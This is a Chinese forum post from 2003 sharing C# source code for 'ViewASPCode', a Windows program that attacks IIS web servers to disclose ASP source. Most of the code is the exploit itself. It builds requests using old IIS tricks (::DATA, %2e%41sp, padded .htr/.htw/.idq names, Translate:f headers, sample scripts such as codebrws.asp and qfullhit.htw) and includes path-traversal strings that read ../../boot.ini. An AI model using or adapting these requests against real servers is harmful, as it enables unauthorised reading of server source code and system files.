一个用c#写的扫描asp源码漏洞的应用程序

你是第71位浏览该文章的人不详不详 2003-3-31
这儿就是昨天说的那个程序主要部分的源代码，如果要全部代码请到我的主页去下载。
贴不开，分两次。
//--------------------------------------------------------------------------
//
// file name : form1.cs
//
// description : 主form
//
// date: 2001/1/3
//
// author : bigeagle@163.net
// http://bigeagle.yeah.net
//
// history : 2000/1/3 version 0.9
//
// ToDo: translate:f 方法似乎有问题，等得到有关http协议的资料在修改
//
//-------------------------------------------------------------------------
namespace findbug
{
    using System;
    using System.Drawing;
    using System.Collections;
    using System.ComponentModel;
    using System.WinForms;
    using System.Data;
    using System.Net;
    using System.IO;
    using System.Text;
    using System.Net.Sockets;

    /// <summary>
    /// Summary description for Form1.
    /// </summary>
    public class Form1 : System.WinForms.Form
    {
        /// <summary>
        /// Required designer variable.
        /// </summary>
        private System.ComponentModel.Container components;
        private System.WinForms.StatusBar barStatus;
        private System.WinForms.Button btnClear;
        private System.WinForms.TextBox txtResult;
        private System.WinForms.Button btnGo;
        private System.WinForms.Label label3;
        private System.WinForms.ComboBox cboMethod;
        private System.WinForms.TextBox txtFileName;
        private System.WinForms.Label label2;
        private System.WinForms.TextBox txtServer;
        private System.WinForms.Label label1;
        private System.WinForms.MenuItem mnuExit;
        private System.WinForms.MenuItem menuItem1;
        private System.WinForms.MenuItem mnuNew;
        private System.WinForms.MenuItem mnuAbount;
        private System.WinForms.MenuItem mnuHelp;
        private System.WinForms.MenuItem mnuSave;
        private System.WinForms.MenuItem mnuFile;
        private System.WinForms.MainMenu mainMenu1;

        public Form1()
        {
            //
            // Required for Windows Form Designer support
            //
            InitializeComponent();

            //初始化窗口
            InitForm();
        }

        public override void Dispose()
        {
            base.Dispose();
            components.Dispose();
        }

        //初始化控件
        private void InitializeComponent()
        {
            this.components = new System.ComponentModel.Container();
            this.mnuSave = new System.WinForms.MenuItem();
            this.mnuNew = new System.WinForms.MenuItem();
            this.cboMethod = new System.WinForms.ComboBox();
            this.btnGo = new System.WinForms.Button();
            this.menuItem1 = new System.WinForms.MenuItem();
            this.mnuFile = new System.WinForms.MenuItem();
            this.txtServer = new System.WinForms.TextBox();
            this.mnuHelp = new System.WinForms.MenuItem();
            this.btnClear = new System.WinForms.Button();
            this.label2 = new System.WinForms.Label();
            this.label1 = new System.WinForms.Label();
            this.mnuAbount = new System.WinForms.MenuItem();
            this.barStatus = new System.WinForms.StatusBar();
            this.mainMenu1 = new System.WinForms.MainMenu();
            this.mnuExit = new System.WinForms.MenuItem();
            this.txtResult = new System.WinForms.TextBox();
            this.label3 = new System.WinForms.Label();
            this.txtFileName = new System.WinForms.TextBox();
            mnuSave.Text = "保存";
            mnuSave.Shortcut = System.WinForms.Shortcut.CtrlS;
            mnuSave.Index = 1;
            mnuNew.Text = "新建";
            mnuNew.Shortcut = System.WinForms.Shortcut.F2;
            mnuNew.Index = 0;
            mnuNew.Click += new System.EventHandler(this.mnuNew_Click);
            cboMethod.Location = new System.Drawing.Point(96, 56);
            cboMethod.Size = new System.Drawing.Size(121, 20);
            cboMethod.TabIndex = 4;
            btnGo.Location = new System.Drawing.Point(296, 56);
            btnGo.Size = new System.Drawing.Size(75, 23);
            btnGo.TabIndex = 6;
            btnGo.Text = "让我看";
            btnGo.Click += new System.EventHandler(this.btnGo_Click);
            menuItem1.Text = "-";
            menuItem1.Index = 2;
            mnuFile.Text = "文件(&F)";
            mnuFile.Index = 0;
            mnuFile.MenuItems.All = new System.WinForms.MenuItem[4] { this.mnuNew, this.mnuSave, this.menuItem1, this.mnuExit };
            txtServer.Location = new System.Drawing.Point(96, 16);
            txtServer.Text = "http://";
            txtServer.TabIndex = 1;
            txtServer.Size = new System.Drawing.Size(100, 21);
            mnuHelp.Text = "帮助(&H)";
            mnuHelp.Index = 1;
            mnuHelp.MenuItems.All = new System.WinForms.MenuItem[1] { this.mnuAbount };
            btnClear.Location = new System.Drawing.Point(408, 56);
            btnClear.Size = new System.Drawing.Size(75, 23);
            btnClear.TabIndex = 8;
            btnClear.Text = "清空";
            btnClear.Click += new System.EventHandler(this.btnClear_Click);
            label2.Location = new System.Drawing.Point(224, 16);
            label2.Text = "文件名：";
            label2.Size = new System.Drawing.Size(72, 16);
            label2.Font = new System.Drawing.Font("宋体", 12);
            label2.TabIndex = 2;
            label1.Location = new System.Drawing.Point(24, 21);
            label1.Text = "主机名：";
            label1.Size = new System.Drawing.Size(72, 16);
            label1.Font = new System.Drawing.Font("宋体", 12);
            label1.TabIndex = 0;
            mnuAbount.Text = "关于";
            mnuAbount.Shortcut = System.WinForms.Shortcut.CtrlA;
            mnuAbount.Index = 0;
            mnuAbount.Click += new System.EventHandler(this.mnuAbount_Click);
            barStatus.BackColor = System.Drawing.SystemColors.Control;
            barStatus.Location = new System.Drawing.Point(0, 423);
            barStatus.Size = new System.Drawing.Size(568, 18);
            barStatus.TabIndex = 9;
            barStatus.Text = "就绪";
            mainMenu1.MenuItems.All = new System.WinForms.MenuItem[2] { this.mnuFile, this.mnuHelp };
            mnuExit.Text = "退出(&X)";
            mnuExit.Shortcut = System.WinForms.Shortcut.AltF4;
            mnuExit.Index = 3;
            mnuExit.Click += new System.EventHandler(this.mnuExit_Click);
            txtResult.Location = new System.Drawing.Point(16, 96);
            txtResult.Multiline = true;
            txtResult.ScrollBars = System.WinForms.ScrollBars.Both;
            txtResult.TabIndex = 7;
            txtResult.Size = new System.Drawing.Size(536, 312);
            txtResult.Visible = false;
            label3.Location = new System.Drawing.Point(32, 56);
            label3.Text = "使用";
            label3.Size = new System.Drawing.Size(56, 16);
            label3.Font = new System.Drawing.Font("宋体", 12);
            label3.TabIndex = 5;
            txtFileName.Location = new System.Drawing.Point(304, 16);
            txtFileName.TabIndex = 3;
            txtFileName.Size = new System.Drawing.Size(232, 21);
            this.Text = "ViewASPCode";
            this.StartPosition = System.WinForms.FormStartPosition.CenterScreen;
            this.AutoScaleBaseSize = new System.Drawing.Size(6, 14);
            this.Menu = this.mainMenu1;
            this.ClientSize = new System.Drawing.Size(568, 441);
            this.Controls.Add(this.barStatus);
            this.Controls.Add(this.btnClear);
            this.Controls.Add(this.txtResult);
            this.Controls.Add(this.btnGo);
            this.Controls.Add(this.label3);
            this.Controls.Add(this.cboMethod);
            this.Controls.Add(this.txtFileName);
            this.Controls.Add(this.label2);
            this.Controls.Add(this.txtServer);
            this.Controls.Add(this.label1);
        }

        //菜单项about点击，显示about对话框
        protected void mnuAbount_Click(object sender, System.EventArgs e)
        {
            about objAbout = new about();
            objAbout.ShowDialog(this);
            objAbout.Dispose();
        }

        //初始化窗口
        private void InitForm()
        {
            this.cboMethod.Items.Add("直接读取");
            this.cboMethod.Items.Add(".");
            this.cboMethod.Items.Add("%81");
            this.cboMethod.Items.Add("::DATA");
            this.cboMethod.Items.Add("%2e");
            this.cboMethod.Items.Add("%2e%41sp");
            this.cboMethod.Items.Add("+.htr");
            this.cboMethod.Items.Add("\\");
            this.cboMethod.Items.Add("longhtr");
            this.cboMethod.Items.Add(".bak");
            this.cboMethod.Items.Add("codebrws.asp");
            this.cboMethod.Items.Add("showcode.asp");
            this.cboMethod.Items.Add("null.htw");
            this.cboMethod.Items.Add("qfullhit.htw");
            this.cboMethod.Items.Add("qsumrhit.htw");
            this.cboMethod.Items.Add("query.idq");
            this.cboMethod.Items.Add("search/qfullhit.htw");
            this.cboMethod.Items.Add("search/qsumrhit.htw");
            this.cboMethod.Items.Add("iirturnh.htw");
            this.cboMethod.Items.Add(".htw");
            this.cboMethod.Items.Add("Translate:f");

            this.cboMethod.SelectedIndex = 0;
        }

        //新建
        protected void mnuNew_Click(object sender, System.EventArgs e)
        {
            this.txtServer.Text = "http://";
            this.txtFileName.Text = "";
            this.txtResult.Text = "";
        }

        //清除结果
        protected void btnClear_Click(object sender, System.EventArgs e)
        {
            this.txtResult.Text = "";
        }

        //主要方法
        protected void btnGo_Click(object sender, System.EventArgs e)
        {
            //解析url
            string strServer = this.txtServer.Text;
            string strUrl = this.txtFileName.Text;
            char[] point = { '.' }; //定义分割符为"."
            char[] line = { '/' }; //定义分割符为"."
            string[] arrString = strUrl.Split(line);

            //求asp文件全名
            string strFileName = arrString[arrString.Length - 1];
            //求从根目录下的路径
            string strPath = strUrl.Substring(0,
            strUrl.Length - strFileName.Length);

            //解析文件全名
            arrString = strFileName.Split(point);
            //求文件扩展名
            string strLast = arrString[arrString.Length - 1];
            //求文件名
            string strFirst = strFileName.Substring(0,
            strFileName.Length - strLast.Length - 1);

            //使按钮、输入框等失效
            this.txtServer.ReadOnly = true;
            this.txtFileName.ReadOnly = true;
            this.btnClear.Enabled = false;
            this.btnGo.Enabled = false;

            if (this.txtServer.Text == "http://" || this.txtFileName.Text == ""
            || this.txtServer.Text.Trim() == "" ||
            this.txtServer.Text.Substring(0, 7) != "http://")
            {
                MessageBox.Show("请输入正确的主机名和文件名！");
                this.txtServer.Focus();
            }
            else
            {
                this.txtResult.Visible = true;
                this.txtResult.ReadOnly = true;
                this.barStatus.Text = "正在连结主机…";

                string strRequestFile;

                switch (this.cboMethod.SelectedIndex)
                {
                    case 0: //直接读取
                        strRequestFile = strServer + strUrl;
                        break;
                    case 5: //%2e%41sp
                        strRequestFile = strServer + strPath + strFirst
                        + "%2e%41sp";
                        break;
                    case 8: //longhtr
                        strRequestFile = strServer + strUrl
                        + "+%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htr";
                        break;
                    case 10: //codebrws.asp
                        strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                        + strUrl;
                        break;
                    case 11: //showcode.asp
                        strRequestFile = strServer + "/iissamples/exair/howitworks/codebrws.asp?source="
                        + "/msadc/../../../../boot.ini";
                        break;
                    case 12: //null.htw
                        strRequestFile = strServer + "/null.htw?CiWebHitsFile="
                        + strUrl + "%20&CiRestriction=none&CiHiliteType=Full";
                        break;
                    case 13: //qfullhit.htw
                        strRequestFile = strServer + "/iissamples/issamples/oop/qfullhit.htw?"
                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                        + "&CiHiliteType=Full";
                        break;
                    case 14: //qsumrhit.htw
                        strRequestFile = strServer + "/iissamples/issamples/oop/qsumrhit.htw?"
                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                        + "&CiHiliteType=Full";
                        break;
                    case 15: //query.idq
                        strRequestFile = strServer + "/query.idq?CiTemplate=/../../boot.ini"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20.htx";
                        break;
                    case 16: //search/qfullhit.htw
                        strRequestFile = strServer + "/iissamples/exair/search/qfullhit.htw?"
                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                        + "&CiHiliteType=Full";
                        break;
                    case 17: // search/qsumrhit.htw
                        strRequestFile = strServer + "/iissamples/exair/search/qsumrhit.htw?"
                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                        + "&CiHiliteType=Full";
                        break;
                    case 18: //iirturnh.htw
                        strRequestFile = strServer + "/iishelp/iis/misc/iirturnh.htw?"
                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                        + "&CiHiliteType=Full";
                        break;
                    case 19: //.htw
                        strRequestFile = strServer + strUrl
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%"
                        + "20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20"
                        + "%20%20%20%20%20%20%20%20%20%20%20.htw?"
                        + "CiWebHitsFile=/../../boot.ini&CiRestriction=none"
                        + "&CiHiliteType=Full";
                        break;
                    default:
                        strRequestFile = strServer + strUrl + this.cboMethod.Text;
                }

                this.barStatus.Text = "发送请求："
                + (strRequestFile.Length >= 50 ?
                strRequestFile.Substring(0, 50)
                : strRequestFile)
                + "...";

                string strResult;
                //如果不是translate:f方法则可以直接发送http请求
                if (this.cboMethod.SelectedIndex != 20)
                {
                    //直接发送http请求
                    strResult = Get_Http(strRequestFile);

                    this.barStatus.Text += "完成。";
                    strResult = strResult == "" ? "未找到！" : strResult;
                    this.txtResult.Text = strResult;
                }
                else //translate:f方法需要建立tcp/ip连接
                {
                    string strRequest = "GET " + strServer + strUrl
                    + "\r\nHTTP/1.0\r\nTranslate:f\r\n";
                    strResult = Get_Socket_Request(strServer, strRequest, 80);
                    this.barStatus.Text += "完成。";
                    strResult = strResult == "" ? "未找到！" : strResult;
                    this.txtResult.Text = strResult;
                }
            }

            //使按钮、输入款等恢复
            this.txtServer.ReadOnly = false;
            this.txtFileName.ReadOnly = false;
            this.btnClear.Enabled = true;
            this.btnGo.Enabled = true;
        }

        //通过同server建立tcp/ip连接，发送socket命令
        private string Get_Socket_Request(string a_strServer, string a_strRequest, Int32 a_intPort)
        {
            //Set up variables and String to write to the server
            Encoding ASCII = Encoding.Default;
            string Get = a_strRequest + "Connection: Close\r\n\r\n";
            //string Get =
            Byte[] ByteGet = ASCII.GetBytes(Get);
            Byte[] RecvBytes = new Byte[256];
            String strRetPage = null;

            // IPAddress and IPEndPoint represent the endpoint that will
            // receive the request
            IPAddress hostadd = DNS.Resolve(a_strServer.Substring(7, a_strServer.Length - 7));
            IPEndPoint EPhost = new IPEndPoint(hostadd, a_intPort);

            //Create the Socket for sending data over TCP
            Socket s = new Socket(AddressFamily.AfINet, SocketType.SockStream,
            ProtocolType.ProtTCP);

            // Connect to host using IPEndPoint
            if (s.Connect(EPhost) != 0)
            {
                strRetPage = "Unable to connect to host";
                return strRetPage;
            }

            // Sent the GET text to the host
            s.Send(ByteGet, ByteGet.Length, 0);

            // Receive the page, loop until all bytes are received
            Int32 bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);
            strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);

            while (bytes > 0)
            {
                bytes = s.Receive(RecvBytes, RecvBytes.Length, 0);
                strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
            }

            return strRetPage;
        }

        //获取http页面函数
        private string Get_Http(string a_strUrl)
        {
            string strResult;
            HttpWebRequest myReq = (HttpWebRequest)
            WebRequestFactory.Create(a_strUrl);

            try
            {
                HttpWebResponse HttpWResp = (HttpWebResponse)myReq.GetResponse();
                Stream myStream = HttpWResp.GetResponseStream();

                StreamReader sr = new StreamReader(myStream, Encoding.Default);
                StringBuilder strBuilder = new StringBuilder();
                while (-1 != sr.Peek())
                {
                    strBuilder.Append(sr.ReadLine() + "\r\n");
                }

                strResult = strBuilder.ToString();
            }
            catch (Exception exp)
            {
                strResult = "错误：" + exp.Message;
            }

            return strResult;
        }

        //退出
        protected void mnuExit_Click(object sender, System.EventArgs e)
        {
            if (MessageBox.Show("真的退出吗？", "退出系统", MessageBox.YesNo) == DialogResult.Yes)
            {
                this.Close();
            }
        }

        //主函数
        public static void Main(string[] args)
        {
            Application.Run(new Form1());
        }
    }
}
# 一个用c#写的扫描asp源码漏洞的应用程序

一个用c#写的扫描asp源码漏洞的应用程序
